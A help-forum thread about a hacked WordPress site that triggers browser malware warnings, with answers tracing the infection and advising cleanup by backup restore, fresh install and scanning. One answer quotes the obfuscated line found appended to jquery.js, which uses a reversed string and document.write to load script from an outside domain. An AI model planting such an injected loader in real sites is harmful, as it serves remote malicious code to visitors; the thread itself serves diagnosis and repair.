# Eficon.co.ug Malware issue

Tags: php, wordpress

When I try to login to my wordpress application, I receive a malware warning from Google Chrome detecting content from eficon.co.ug on my website.

I made some scripts to scan the site and found out that it is implemented through a function called admin_print_scripts.

I then made another script to determine which files this function appears in:

/wp-content/plugins/woocommerce/admin/post-types/shop_order.php

/wp-content/themes/twentyfourteen/functions.php

/wp-includes/default-filters.php

/wp-admin/includes/template.php

/wp-admin/includes/media.php

/wp-admin/admin-header.php

/wp-admin/press-this.php

/wp-admin/custom-header.php

I looked through these files and found nothing.

Anyone else who has tried something similar and found a solution??

Cheers.

Answer (score 0, accepted):

Our site was also compromised this morning, after hours of searching we tracked it down to the jquery.js located in /wp-includes/js/jquery/jquery.js

At the bottom of the jQuery lib it has this annoying section of code:

```
document.write('>tpircs/<>"/rcs/gu.oc.nocife//:ptth"=crs tpircs<'.split("").reverse().join(""))
```

We are uncertain how the site was compromised, but we are still looking.

Comment: After tracking logs we believe that the entry point might have been via plugin called RevSlider.

Answer (score 0):

I'm sorry to hear your site was damaged. If you have a malware free backup, restoring is the easiest and fastest way of getting your site working again.

If a backup isn't available and your site isn't highly modified, starting with a **completely** new installation of the WordPress core, plugins and theme is the second best option. I would download everything in public_html at the damaged account to a folder on your PC and then completely delete public_html. Then reconnect your database after the fresh installation and a careful search for malware in the database.

If you have a lot of recent data changes, a highly modified template (or other files) AND no backup, you'll need to find and remove **all** the malware yourself. As you have already found, there are both files that were not in your original installation and files that came with the installation but are now modified.

There are a number of good plugins that will help you find bad files and repair your site. Wordfence will scan your site for malicious code. It will tell you if you can delete a file or it will reset the file to it's original condition. Be sure to look at the file to make sure Wordfence found bad code and not one of your modifications. Wordfence has a compare documents function built in to help with this task.

This is not an easy job. You have to find everything the hacker added or changed. If you don't, your site will probably be damaged again. Don't stop looking just because your site seems to be working.You will want to run as many server side malware scans from different plugins as you can find. Wordfence is a very good product but it may not find every piece of bad code.

Remember after you have cleaned the files. you will still need to make sure the database is free of malware.

There is a good resource for WordPress sites at https://wordpress.org/support/. Join up and search the forum for "hacked site". There are lots of people there to help and a ton of information.

Good luck with your repairs.

Answer (score 0):

I searched the WordPress Database of my site and found the same code as above by searching all tables for "gu.oc".  I found the annoying code in a text widget on my home page.  After eliminating this line of code from the test widget, Chrome no longer claimed malware on my website.